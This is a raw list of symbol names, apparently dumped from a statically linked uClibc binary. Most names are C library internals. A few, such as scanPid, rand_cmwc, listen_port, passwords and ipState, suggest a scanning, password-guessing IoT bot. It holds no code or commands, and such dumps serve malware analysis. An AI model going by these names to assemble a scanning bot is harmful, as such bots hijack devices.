__GI_waitpid
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
stderr
fails
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__libc_fork
__atexit_lock
scanPid
listen_port
rand_cmwc
advances
__libc_fcntl64
getsockopt
__GI_fseeko64
hstrerror
fflush_unlocked
__stdio_wcommit
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
ipState
access
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
__C_ctype_toupper_data
_dl_aux_init
__GI_perror
_errno
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__libc_creat
strlen
lseek64
open
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
clock
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
__GI_raise
__data_start
setsid
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
__GI___errno_location
fcntl
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
__GI_getsockname
close
__libc_connect
passwords
__GI_strlen
pids
vfprintf
strpbrk
_load_inttype
raise
free
sigprocmask
getsockname
